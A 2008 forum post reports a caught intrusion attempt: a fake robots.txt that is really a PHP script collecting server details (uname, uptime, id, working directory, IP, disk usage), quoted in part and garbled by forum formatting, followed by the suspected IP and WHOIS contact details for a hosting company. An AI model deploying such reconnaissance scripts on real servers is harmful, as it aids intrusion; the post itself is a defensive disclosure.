View Single Post
Old 11th June 2008, 01:55 AM   #11 (permalink)
pursuit
Registered User
 
Join Date: Feb 2006
Location: London, UK
Posts: 281
I just caught one real life example today - a utter stupid person may just learn something from here and tried to get his hand dirty (except that he did not get what he wanted):
the robot.txt is in fact a php file trying to steal some server info:
PHP Code:
<?php
function ConvertBytes($number)
{
        
$len strlen($number);
        if(
$len 4)
        {
                return 
sprintf("%d b"$number);
        }
        if(
$len >= && $len <=6)
        {
                return 
sprintf("%0.2f Kb"$number/1024);
        }
        if(
$len >= && $len <=9)
        {
                return 
sprintf("%0.2f Mb"$number/1024/1024);
        }

        return 
sprintf("%0.2f Gb"$number/1024/1024/1024);

}

echo 
"^bryan_ae1^<br>";
$un = @php_uname();
$up system(uptime);
...


echo 
"bryan_ae1 was here ..<br>";
echo 
"uname -a: $un<br>";
echo 
"os: $os<br>";
echo 
"uptime: $up<br>";
echo 
"id: $id1<br>";
echo 
"pwd: $pwd1<br>";
echo 
"php: $php1<br>";
echo 
"software: $sof1<br>";
echo 
"server-name: $name1<br>";
echo 
"server-ip: $ip1<br>";
echo 
"free: $free<br>";
echo 
"used: $used<br>";
echo 
"total: $all<br>";
exit;
?>
that person was using a London based IP:62.128.131.80
who obviously had access to the site freelance.eu, the details of which is:
Quote:
Domain Name freelance
Status REGISTERED (What this means)
Registered July 17, 2006
Last update July 17, 2006, 10:19 am

Registrant
Name P.J.H. van Lier
Organisation NL Hosting Internet BV
Language Dutch
Address


Phone +31.645422166
Email admin@nlhosting.com

Registrant technical contacts
Name P.J.H. van Lier
Organisation NL Broadband Internet B.V.
Language Dutch
Address

Phone
Fax
Email

Registrar technical contacts
Name P.J.H. van Lier
Organisation NL Broadband Internet B.V.
Language Dutch
Address

Phone
Fax
Email

Registrar
Organisation NL Broadband Internet B.V.
Website Broadband.nl - .....

Nameservers
ns.nlhosting.net
ns1.nlhosting.net
maybe UH could make a complaint to that hosting company?

Last edited by pursuit : 11th June 2008 at 02:12 AM. Reason: i had a second thought and deleted part of the php code.
pursuit is offline   Reply With Quote